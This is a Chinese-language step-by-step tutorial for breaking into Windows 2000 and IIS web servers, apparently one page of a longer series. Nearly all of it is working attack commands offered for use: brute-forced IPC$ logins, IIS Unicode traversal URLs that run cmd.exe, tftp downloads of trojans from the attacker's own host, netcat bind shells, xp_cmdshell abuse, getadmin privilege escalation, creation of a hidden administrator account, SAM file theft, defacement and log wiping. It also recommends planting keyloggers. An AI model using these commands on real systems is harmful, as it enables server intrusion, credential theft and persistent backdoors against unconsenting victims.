Win2000入侵超详细教程

实际四（暴力法和权限升级） 
在WIN2000的命令提示符下 

这样输入 
c:\"gt;newletmein xxx.xxx.xxx.xxx -all -g 
xxx.xxx.xxx.xxx是你要攻击的网站的IP地址然后等待程序执行完毕，如果发现可用的用户名和密码，程序会告诉你，记住这个用户名和密码，再这样输入(这里假设用户名为ADMIN。密码也是ADMIN） 
c:\"gt;net use \\XXX.XXX.XXX.XXX\IPC$ "quot;ADMIN"quot; /USER:"quot;ADMIN"quot; 
程序显示命令完成，接着来 
c:\"gt;copy c:\netsvc.exe \\xxx.xxx.xxx.xxx\admin$\system32 
程序显示1个文件COPY成功 
接着来 
c:\"gt;copy c:\ntsrv.exe \\xxx.xxx.xxx.xxx\admin$\system32 
程序显示1个文件COPY成功 
接着来 
c:\"gt;netsvc \\xxx.xxx.xxx.xxx schedule /start 
等显示成功，接着来,这里假设对方时间为13:00(这里可以用NET TIME看时间） 
c:\"gt;at \\xxx.xxx.xxx.xxx 13:00 ntsrv.exe /port:65432 /nomsg 
程序会告诉你这个命令的ID号，等时间一到，用木马连他的机器的65432端口可以加上自己的密码，和更改端口，目标搞定到，为了确认这个漏洞，你可以在浏览器的网址栏里输入这个文件的具体路径来确认IE将显示application/x_varg，说明这个漏洞存在，然后在PERL下，进行攻击 
C:\Perl\BIN"gt;perl -x msadcs.txt -h xxx.xxx.xxx.xxx 
Please type the NT commandline you want to run (cmd /c assumed):\n 
cmd /c 一般这里我用TFTP上传我的木马文件，但首先你得先设置好你的TFTP主机 
tftp -i 127.0.0.1 get ntsrv.exe c:\winnt\system32\ntsrv.exe 
这里127.0.0.1 是我的TFTP主机，TFTP目录下有NTSRV。EXE木马 如果程序执行成功，TFTP会显示文件传输的进度，然后再执行PERL，将木马激活，你再用木马连上对方的机器，搞定 

如果WEB服务器用ASP等等。。。你如果能看到ASP或者GLOBAL。ASA的原码，而且把用户名或者密码写在这里，OK，你已经差不多搞定拉,打开SQL SERVER 7。0 在client network uitlity里输入对方IP，通讯选TCP/IP 端口选1433，然后应用确定，再打开query analyzer SERVER选你要攻击的IP，用户名和密码输入，连接他，等会，连上拉 
在上面这样输入 
create proc #1 as exec master..xp_cmdshell'dir c:\' 
go 
exec #1 
按F5执行，会显示对方机器的文件目录，然后用TFTP上传你的木马，并且执行，再用木马连接他, 搞定（需要注意的是PROC的号要执行1次换1个，单引号间是命令行） 

这里不说，也说不好，照着干就可以拉。发现目标XXX。XXX。XXX。XXX 
在浏览器里输入 
http://xxx.xxx.xxx.xxx/.idq 
显示路径，WEB是在那里 
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd.exe?/c dir 
这样我们将得到对方的文件目录 
然后这样 
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd.exe?/c tftp -i 61.137.157.156 get ntsrv.exe c:\winnt\system32\ntsrv.exe 
等文件传完，再这样 
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd.exe?/c c:\winnt\system32\ntsrv.exe 
木马被启动，用木马连上，搞定。 

如果权限不够，我们下面来升级权限 
自己C盘下的gasys.dll、cmd.exe和getadmin.exe到对方的E盘下， 
（这三个文件是黑NT毕备的，很多站点可以下载到） 

可以到DOS下输入：(下面是NETUSE后的盘，如果不懂，先学NETUSE去) 
C:\"gt;copy c:\gasys.dll F:\ 
C:\"gt;copy c:\cmd.exe F:\ 
C:\"gt;copy c:\getadmin.exe F:\ 
至此为止，肉鸡已经搞定了。现在我们要象主目标进行攻击了。假设对方网站的ip是127.1.1.1,先要把cmd.exe复制到scripts的目录下面，并且要改名，假设对方的物理盘为E ： 
http://127.1.1.1/scripts/..á../winnt/system32/cmd.exe?/c copy e:\winnt\system32\cmd.exe e:\inetpub\scripts\hackercn 
.exe 
这样我们就已经把cmd.exe复制到了scripts的目录下，并改名为hackercn.exe。现在我们要用它把我们肉鸡上的E盘影射为这个网站服务器上的Y 盘： 
http://127.1.1.1/scripts/hackercn.exe?/c net use Y: \\127.1.1.2\E 

然后把我们copy过去的那3个文件再copy到网站服务器上(cmd.exe虽然刚才已经copy过去了，但因为改了名，所以还要再copy一次）： 
http://127.1.1.1/scripts/..á../winnt/system32/cmd.exe?/c copy Y:\gasys.dll d:\inetpub\scripts\gasys.dll 
http://127.1.1.1/scripts/..á../winnt/system32/cmd.exe?/c copy Y:\cmd.exe d:\inetpub\scripts\cmd.exe 
http://127.1.1.1/scripts/..á../winnt/system32/cmd.exe?/c copy Y:\getadmin.exe d:\inetpub\scripts\getadmin.exe 


好了，现在我们需要把“IUSR_计算机名”这个帐号升级为Administrator（并不是每个站点都有“IUSR_计算机名”这个帐号）。假设这台计算机名为“S ERVERS”，那么我们可以这样做： 
http://127.1.1.1/scripts/getadmin.exe?IUSR_SERVERS 

这样所有的访问者都有了Administrator限权， 
然后我们再来新建一个用户名为hacker密码为password的用户： 
http://127.1.1.1/script/cmd.exe?/c c:\winnt\system32\net.exe user hacker password /add 
然后再把它授予Administrator限权: 
http://127.1.1.1/scripts/getadmin.exe?hacker 

下来就是进入该系统并制作后门了： 
在nt的dos下输入 
C:\"gt;net use \\127.1.1.1\ipc$ "quot;password"quot; /user:"quot;hacker"quot; 
现在你已经登陆到了他的主机上，然后上传木马冰河： 
C:\"gt;copy C:\unzipped\newglacier\G_Server.exe \\127.1.1.1\admin$\system32 
然后用net time来获得对方的时间： 
C:\"gt;net time \\127.1.1.1 
假设对方的时间是5点40，那么我们将在5点43启动冰河程序： 
C:\"gt;at \\127.1.1.1 05:43 G_Server.exe 

这样我们就完整的实现了一次入侵，别忘了最后要打扫战场 
用冰河很讨厌，我个人是不赞成用木马的，我们可以上载其他端口程序。 

实践五（简单实用） 
我们假设1.29.58.9有这类型漏洞myip就是我的IP，GIFT是我计算机上共享的文件名。我把NCx99.exe那个文件放到这个目录下了。 
http://1.29.58.9/scripts/..?../winnt/system32/net.exe?/c use i: \\myip\gift 时间要长点，多等一会儿。 
成功后，你就可以用COPY命令，把NCX99.EXE文件从I盘CP过来了(放在system32或你喜欢的目录下) 
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd.exe?/c copy i:\gift\ncx99.exe c:\inetpub\scripts\ncx99.exe 
启动ncx99.exe 
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd.exe?/c c:\inetpub\scripts\ncx99.exe 
用telnet连上就可以了。 
如果权限不够可以用上面我们讲的方法来增加权限。或添加用户。 

实践六(打扫战场) 

打扫战场 
最后一步就是清除我们用到的一些临时文件和测试的文件，伪装一下日志，免得被发现，这就叫做是打扫战场。然后记得卸载冰河啊，我们不是过去破坏的， 只是为了学习和研究，熟悉入侵的手段和思想，学会分析问题，解决问题，为将来的实战做个练习而已嘛！ 
所以也不要修改主页啦！给他们的网管留一份e-mail也好啦！其实，我们传上去的ncx99.exe是netcat的另一个版本，运行后，会把cmd.exe绑定到99端口， 也就是说，运行以后，会在99端口侦听，我们可以用telnet连接。 
C:"gt;telnet xxx.xxx.xxx.xxx 99 
就看到： 
c:\inetpub\scripts"gt; 
呵呵，现在就相当于进入他的机器啦，后面的东西不用继续说了吧？键入exit退出后，对方的ncx99也退出啦。如果你真的想要他的管理员账号，那么，我想，最起码可以这样：传个纪录键盘的东东上去，怎么样？比你破解简单多啦！你当然也可以用冰河什么的。你也可以给自己建个账号，方便自己，不过很可能会被发现的啦。 
好啦好啦，不再说啦，烦死人了。如果你用了木马，就要想办法去掉，要不就留到以后用。随你了。 这么一次入侵完成了，我们至少要学会入侵的基本步骤，还有入侵的思维方式啦。 好好体会吧。 

实用命令总结： 

列目录： 
http://ip/msadc/..?../..?../..?../winnt/system32/cmd.exe?/c dir c:\ 
http://www.victim.com/scripts/..?../winnt/system32/cmd.exe?/c dir c:\ 

Copy文件 
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd.exe?/c copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\ 
NET USE的使用 
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/net.exe?/c use i: \\myip\temp 

改CMD方法 
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd.exe?/c copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\ccc.exe 
然后 
http://xxx.xxx.xxx.xxx/scripts/ccc.exe?/c echo Hacked by chinese "gt; f:\wwwroot\xxx\default.asp 

FIND命令使用 
比如我要查看WEB目录d:\inetpub\wwwroot下的所有asp、asa文件的内容： 
http://xxx.xxx.xxx.xxx/scripts/..?..\winnt/system32/find.exe?/n /v "quot;"quot; d:\inetpub\wwwroot\*.as* 

添加用户命令 
新建一个用户名为hacker密码为password的用户： 
http://127.1.1.1/script/cmd.exe?/c c:\winnt\system32\net.exe user hacker password /add 

当然命令是构造出来的，利用这些规则我们可以写很多的类似的命令。 
也希望大家把自己构造的好的想法和实现贴出来 
如果你找不到目标可以去www.goole.com找。 
它的危害大家我想都知道了。 

呵呵 大家多练习呀 对了好象上面的 ftp 传文件很困难 是吧我也是 呵呵其实有个好工具哦
有了它你就有对 Unicode漏洞的实现 我看哪个工具就是专门给Unicode漏洞用的 

工具: 
tftpd32.exe（一个FTP服务器） 
ncx99.exe（telnet 到99端口） 
这两个大家都熟悉吧，其他的不用管。 
运行tftpd32.exe 

这是一个小巧的FTP服务器，在运行它之前，建议关闭其他FTP服务器，保持tftpd运行，这时你的机器已经是一个FTP服务器了。 

回到你的浏览器，在地址栏里填入： 

http://202.111.111.11/scripts/..?../winnt/system32/cmd.exe?/c tftp -i%???.???.???.??? GET srv.exe c:\\inetpub\\scripts\\srv.exe 
???.???.???.???为你自己的IP，注意：c:\\inetpub\\scripts\\srv.exe 其中c:\\inetpub\\scripts\\为主机服务器目录，要看主机的具体情况而定，srv.exe为被改名的ncx99.exe（自己选名字吧）。 

然后等待...大概3分钟...IE浏览器左下角显示完成，红色漏斗消失，这时ncx99.exe已经上传到主机c:\inetpub\scripts\目录了，您可以自己检查一下。 

再使用如下调用来执行ncx99.exe(srv.exe) 

http://202.100.100.1/scripts/..?../winnt/system32/cmd.exe?/c c:\inetpub\scripts\sr.exe 
然后您就可以 telnet 202.111.111.11 99 

以后就看你怎么使用这台机器了。当然您上传什么控制文件也由您自己决定，这只是一个方法。srv.exe 这个其实就是ncx99.exe 呵呵你也可以自己改名字呀, 好了 cgi 就将到着了 要想更深入了解 你还是自己找专门介绍cgi 的文章吧无心的cgi大全就很不错的 

好了 该将我最喜欢的 3389 了 

什么是 终端服务就是让管理员远程管理计算机的但在输入法里有个致命漏洞, 这样就对我们方便多了你可以用上面的ipc 和cgi 漏洞得到管理员权限 在用3389 远程管理 

好了该开始将 输入法漏洞了 
实际上我把3篇相关文章放到一起呢，我比较喜欢第一种实际测试中也证明非常好用可以完全成功的。 

上一页  [1] [2] [3] [4] 下一页